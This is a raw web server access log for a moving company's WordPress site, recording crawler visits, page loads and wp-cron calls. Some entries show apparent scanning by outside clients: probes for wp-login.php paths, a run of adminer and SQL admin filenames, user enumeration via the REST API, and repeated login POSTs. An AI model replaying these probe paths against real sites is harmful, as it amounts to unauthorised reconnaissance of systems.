102.129.143.26 - - [13/Oct/2022:17:39:25 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "gatipackers.com"
102.129.143.26 - - [13/Oct/2022:17:39:26 -0700] "GET / HTTP/1.1" 200 14528 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "gatipackers.com"
10.213.116.209 - - [13/Oct/2022:17:39:30 -0700] "POST /wp-cron.php?doing_wp_cron=1665707970.5475239753723144531250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665707970.5475239753723144531250" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
102.129.143.26 - - [13/Oct/2022:17:39:33 -0700] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 13879 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "gatipackers.com"
50.54.130.20 - - [13/Oct/2022:17:39:38 -0700] "HEAD / HTTP/1.1" 200 - "https://www.bing.com" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "gatipackers.com"
50.54.130.20 - - [13/Oct/2022:17:39:41 -0700] "GET /wp-login.php HTTP/1.1" 200 7983 "http://gatipackers.com" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "gatipackers.com"
50.54.130.20 - - [13/Oct/2022:17:39:44 -0700] "GET /wordpress/wp-login.php HTTP/1.1" 404 88 "http://gatipackers.com" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "gatipackers.com"
50.54.130.20 - - [13/Oct/2022:17:39:44 -0700] "GET /blog/wp-login.php HTTP/1.1" 404 88 "http://gatipackers.com" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "gatipackers.com"
50.54.130.20 - - [13/Oct/2022:17:39:44 -0700] "GET /wp/wp-login.php HTTP/1.1" 404 88 "http://gatipackers.com" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "gatipackers.com"
20.124.114.167 - - [13/Oct/2022:17:46:50 -0700] "GET /wp-admin/css/ HTTP/1.1" 200 144 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
64.124.8.50 - - [13/Oct/2022:17:53:50 -0700] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "gatipackers.com"
64.124.8.50 - - [13/Oct/2022:17:53:50 -0700] "GET / HTTP/1.1" 200 14528 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "gatipackers.com"
10.213.116.209 - - [13/Oct/2022:17:53:54 -0700] "POST /wp-cron.php?doing_wp_cron=1665708834.4966371059417724609375 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665708834.4966371059417724609375" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
64.124.8.50 - - [13/Oct/2022:17:57:03 -0700] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "gatipackers.com"
20.124.23.204 - - [13/Oct/2022:18:13:14 -0700] "GET / HTTP/1.1" 200 14528 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" "gatipackers.com"
10.213.116.211 - - [13/Oct/2022:18:13:20 -0700] "POST /wp-cron.php?doing_wp_cron=1665710000.2719409465789794921875 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665710000.2719409465789794921875" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
114.119.156.95 - - [13/Oct/2022:18:35:04 -0700] "GET /blog/tags/askmoverspackers HTTP/1.1" 404 88 "https://www.gatipackers.com/post/movers-packers-guide-top-8-questions-you-should-ask-movers-packers-companies-before-hiring" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.gatipackers.com"
114.119.138.13 - - [13/Oct/2022:18:37:21 -0700] "GET /?C=N%3BO%3DD HTTP/1.1" 200 14614 "https://www.gatipackers.com?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.gatipackers.com"
10.213.116.209 - - [13/Oct/2022:18:37:28 -0700] "POST /wp-cron.php?doing_wp_cron=1665711448.4854140281677246093750 HTTP/1.1" 200 - "https://gatipackers.com/wp-cron.php?doing_wp_cron=1665711448.4854140281677246093750" "WordPress/5.6.9; https://gatipackers.com" "gatipackers.com"
114.119.141.116 - - [13/Oct/2022:18:47:42 -0700] "GET /index.php/2020/08 HTTP/1.1" 404 9066 "http://gatipackers.com?ref=w3use" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "gatipackers.com"
10.213.116.209 - - [13/Oct/2022:18:47:46 -0700] "POST /wp-cron.php?doing_wp_cron=1665712066.6365940570831298828125 HTTP/1.1" 200 - "https://gatipackers.com/wp-cron.php?doing_wp_cron=1665712066.6365940570831298828125" "WordPress/5.6.9; https://gatipackers.com" "gatipackers.com"
114.119.141.116 - - [13/Oct/2022:18:53:42 -0700] "GET /index.php/author/administrator/ HTTP/1.1" 200 14285 "https://gatipackers.com?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "gatipackers.com"
10.213.116.210 - - [13/Oct/2022:18:53:46 -0700] "POST /wp-cron.php?doing_wp_cron=1665712426.3921959400177001953125 HTTP/1.1" 200 - "https://gatipackers.com/wp-cron.php?doing_wp_cron=1665712426.3921959400177001953125" "WordPress/5.6.9; https://gatipackers.com" "gatipackers.com"
114.119.145.42 - - [13/Oct/2022:18:59:28 -0700] "GET /post/movers-packers-guide-top-8-questions-you-should-ask-movers-packers-companies-before-hiring HTTP/1.1" 404 88 "https://www.gatipackers.com?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.gatipackers.com"
207.46.13.93 - - [13/Oct/2022:19:01:33 -0700] "GET /online_quote HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.gatipackers.com"
5.188.62.21 - - [13/Oct/2022:19:05:00 -0700] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 7978 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4758.11 Safari/537.36" "gatipackers.com"
10.213.116.210 - - [13/Oct/2022:19:05:04 -0700] "POST /wp-cron.php?doing_wp_cron=1665713104.2892320156097412109375 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665713104.2892320156097412109375" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
5.188.62.21 - - [13/Oct/2022:19:05:10 -0700] "POST /wp-login.php?wp_lang=en_US HTTP/1.1" 200 8250 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4758.11 Safari/537.36" "gatipackers.com"
10.213.116.209 - - [13/Oct/2022:19:11:51 -0700] "POST /wp-cron.php?doing_wp_cron=1665713511.5477509498596191406250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665713511.5477509498596191406250" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
54.188.135.248 - - [13/Oct/2022:19:46:32 -0700] "GET / HTTP/1.1" 200 14528 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" "gatipackers.com"
10.213.116.210 - - [13/Oct/2022:19:46:36 -0700] "POST /wp-cron.php?doing_wp_cron=1665715596.3536040782928466796875 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665715596.3536040782928466796875" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
34.222.47.136 - - [13/Oct/2022:19:46:40 -0700] "GET / HTTP/1.1" 200 14557 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "gatipackers.com"
34.220.78.106 - - [13/Oct/2022:19:46:39 -0700] "GET / HTTP/1.1" 200 14528 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "gatipackers.com"
52.42.135.133 - - [13/Oct/2022:19:46:52 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "gatipackers.com"
52.42.135.133 - - [13/Oct/2022:19:46:52 -0700] "GET / HTTP/1.1" 200 14557 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "gatipackers.com"
35.90.237.118 - - [13/Oct/2022:19:47:06 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "gatipackers.com"
35.90.237.118 - - [13/Oct/2022:19:47:07 -0700] "GET / HTTP/1.1" 200 14528 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "gatipackers.com"
5.188.62.140 - - [13/Oct/2022:20:41:15 -0700] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 7986 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4895.86 Safari/537.36" "gatipackers.com"
10.213.116.210 - - [13/Oct/2022:20:41:19 -0700] "POST /wp-cron.php?doing_wp_cron=1665718879.7513210773468017578125 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665718879.7513210773468017578125" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
5.188.62.140 - - [13/Oct/2022:20:41:25 -0700] "POST /wp-login.php?wp_lang=en_US HTTP/1.1" 200 8249 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4895.86 Safari/537.36" "gatipackers.com"
110.89.8.60 - - [13/Oct/2022:21:14:29 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 411 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" "gatipackers.com"
176.48.103.239 - - [13/Oct/2022:21:46:02 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36" "gatipackers.com"
176.48.103.239 - - [13/Oct/2022:21:46:02 -0700] "GET / HTTP/1.1" 200 14528 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36" "gatipackers.com"
10.213.116.209 - - [13/Oct/2022:21:46:06 -0700] "POST /wp-cron.php?doing_wp_cron=1665722766.8810660839080810546875 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665722766.8810660839080810546875" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
176.48.103.239 - - [13/Oct/2022:21:46:09 -0700] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 13879 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36" "gatipackers.com"
5.188.62.76 - - [13/Oct/2022:21:54:48 -0700] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 7980 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4758.11 Safari/537.36" "gatipackers.com"
10.213.116.209 - - [13/Oct/2022:21:54:51 -0700] "POST /wp-cron.php?doing_wp_cron=1665723291.4813389778137207031250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665723291.4813389778137207031250" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
5.188.62.76 - - [13/Oct/2022:21:54:57 -0700] "POST /wp-login.php?wp_lang=en_US HTTP/1.1" 200 8250 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4758.11 Safari/537.36" "gatipackers.com"
114.119.146.171 - - [13/Oct/2022:22:31:39 -0700] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.gatipackers.com"
109.206.241.121 - - [13/Oct/2022:22:31:58 -0700] "GET / HTTP/1.1" 200 14528 "-" "python-requests/2.27.1" "gatipackers.com"
10.213.116.209 - - [13/Oct/2022:22:32:06 -0700] "POST /wp-cron.php?doing_wp_cron=1665725526.0099720954895019531250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665725526.0099720954895019531250" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
192.188.170.87 - - [13/Oct/2022:22:44:04 -0700] "GET / HTTP/1.1" 200 14585 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" "www.gatipackers.com"
192.188.170.87 - - [13/Oct/2022:22:44:11 -0700] "GET /wp-includes/css/dist/block-library/theme.min.css?ver=5.6.9 HTTP/1.1" 200 741 "http://www.gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" "gatipackers.com"
192.188.170.87 - - [13/Oct/2022:22:44:11 -0700] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.6.9 HTTP/1.1" 200 7849 "http://www.gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" "gatipackers.com"
192.188.170.87 - - [13/Oct/2022:22:44:11 -0700] "GET /wp-content/themes/twentynineteen/style.css?ver=1.1 HTTP/1.1" 200 19371 "http://www.gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" "gatipackers.com"
192.188.170.87 - - [13/Oct/2022:22:44:11 -0700] "GET /wp-includes/js/wp-embed.min.js?ver=5.6.9 HTTP/1.1" 200 765 "http://www.gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" "gatipackers.com"
192.188.170.87 - - [13/Oct/2022:22:44:11 -0700] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.6.9 HTTP/1.1" 200 4662 "http://www.gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" "gatipackers.com"
192.188.170.87 - - [13/Oct/2022:22:44:12 -0700] "GET /wp-content/themes/twentynineteen/print.css?ver=1.1 HTTP/1.1" 200 1230 "http://www.gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" "gatipackers.com"
192.188.170.87 - - [13/Oct/2022:22:44:13 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "http://www.gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" "www.gatipackers.com"
10.213.116.210 - - [13/Oct/2022:22:44:08 -0700] "POST /wp-cron.php?doing_wp_cron=1665726248.6841280460357666015625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665726248.6841280460357666015625" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
192.188.170.87 - - [13/Oct/2022:22:44:59 -0700] "GET / HTTP/1.1" 200 14585 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" "www.gatipackers.com"
79.137.194.75 - - [13/Oct/2022:22:59:44 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "https://saunanovgorod.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "gatipackers.com"
79.137.194.75 - - [13/Oct/2022:22:59:45 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "https://saunanovgorod.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "gatipackers.com"
79.137.194.75 - - [13/Oct/2022:22:59:46 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "https://saunanovgorod.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "gatipackers.com"
185.181.60.12 - - [13/Oct/2022:23:11:22 -0700] "GET / HTTP/1.1" 200 14528 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54" "gatipackers.com"
10.213.116.210 - - [13/Oct/2022:23:11:28 -0700] "POST /wp-cron.php?doing_wp_cron=1665727888.9114389419555664062500 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665727888.9114389419555664062500" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
42.236.17.89 - - [13/Oct/2022:23:29:29 -0700] "GET / HTTP/1.1" 200 14614 "-" "Mozilla/5.0 (iPhone; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.25 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" "www.gatipackers.com"
42.236.17.89 - - [13/Oct/2022:23:29:37 -0700] "GET /wp-includes/js/wp-embed.min.js?ver=5.6.9 HTTP/1.1" 200 765 "https://www.gatipackers.com/" "Mozilla/5.0 (iPhone; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.25 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" "gatipackers.com"
42.236.17.89 - - [13/Oct/2022:23:29:37 -0700] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.6.9 HTTP/1.1" 200 4662 "https://www.gatipackers.com/" "Mozilla/5.0 (iPhone; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.25 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" "gatipackers.com"
42.236.17.89 - - [13/Oct/2022:23:29:37 -0700] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.6.9 HTTP/1.1" 200 7849 "https://www.gatipackers.com/" "Mozilla/5.0 (iPhone; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.25 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" "gatipackers.com"
42.236.17.89 - - [13/Oct/2022:23:29:37 -0700] "GET /wp-content/themes/twentynineteen/print.css?ver=1.1 HTTP/1.1" 200 1230 "https://www.gatipackers.com/" "Mozilla/5.0 (iPhone; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.25 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" "gatipackers.com"
42.236.17.89 - - [13/Oct/2022:23:29:37 -0700] "GET /wp-content/themes/twentynineteen/style.css?ver=1.1 HTTP/1.1" 200 19371 "https://www.gatipackers.com/" "Mozilla/5.0 (iPhone; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.25 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" "gatipackers.com"
42.236.17.89 - - [13/Oct/2022:23:29:37 -0700] "GET /wp-includes/css/dist/block-library/theme.min.css?ver=5.6.9 HTTP/1.1" 200 741 "https://www.gatipackers.com/" "Mozilla/5.0 (iPhone; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.25 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" "gatipackers.com"
10.213.116.209 - - [13/Oct/2022:23:29:34 -0700] "POST /wp-cron.php?doing_wp_cron=1665728974.0228219032287597656250 HTTP/1.1" 200 - "https://gatipackers.com/wp-cron.php?doing_wp_cron=1665728974.0228219032287597656250" "WordPress/5.6.9; https://gatipackers.com" "gatipackers.com"
114.119.136.188 - - [13/Oct/2022:23:32:37 -0700] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "gatipackers.com"
74.125.151.244 - - [13/Oct/2022:23:53:24 -0700] "GET /apple-app-site-association HTTP/1.1" 404 88 "-" "AdsBot-Google (+http://www.google.com/adsbot.html)" "www.gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:39 -0700] "GET /adminer.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:39 -0700] "GET /mysql.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:39 -0700] "GET /sql.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:39 -0700] "GET /ad.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:39 -0700] "GET /admin.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:40 -0700] "GET /adminer-4.2.5.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:40 -0700] "GET /adminer-4.3.0.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:40 -0700] "GET /adminer-4.3.1.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:40 -0700] "GET /adminer-4.4.0.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:40 -0700] "GET /adminer-4.5.0.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:41 -0700] "GET /adminer-4.6.0.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:41 -0700] "GET /adminer-4.6.1.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "gatipackers.com"
20.243.212.221 - - [14/Oct/2022:00:10:41 -0700] "GET /adminer-4.6.2.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "gatipackers.com"
17.121.113.242 - - [14/Oct/2022:00:22:15 -0700] "GET / HTTP/1.1" 200 14528 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)" "gatipackers.com"
10.213.116.210 - - [14/Oct/2022:00:22:20 -0700] "POST /wp-cron.php?doing_wp_cron=1665732140.1400868892669677734375 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665732140.1400868892669677734375" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
42.236.10.91 - - [14/Oct/2022:01:06:11 -0700] "GET / HTTP/1.1" 200 14614 "https://www.gatipackers.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1;360Spider" "www.gatipackers.com"
10.213.116.209 - - [14/Oct/2022:01:06:15 -0700] "POST /wp-cron.php?doing_wp_cron=1665734775.7544269561767578125000 HTTP/1.1" 200 - "https://gatipackers.com/wp-cron.php?doing_wp_cron=1665734775.7544269561767578125000" "WordPress/5.6.9; https://gatipackers.com" "gatipackers.com"
114.119.128.126 - - [14/Oct/2022:01:35:45 -0700] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "gatipackers.com"
66.249.70.246 - - [14/Oct/2022:01:40:05 -0700] "GET /car-transportation HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.gatipackers.com"
51.79.144.41 - - [14/Oct/2022:02:20:28 -0700] "GET /wp-login.php HTTP/1.1" 200 7985 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
51.79.144.41 - - [14/Oct/2022:02:20:35 -0700] "GET //wp-json/wp/v2/users/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.211 - - [14/Oct/2022:02:20:33 -0700] "POST /wp-cron.php?doing_wp_cron=1665739233.0682098865509033203125 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665739233.0682098865509033203125" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
114.119.145.249 - - [14/Oct/2022:02:25:34 -0700] "GET /online_quote HTTP/1.1" 404 88 "https://gatipackers.com/moving_tips" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "gatipackers.com"
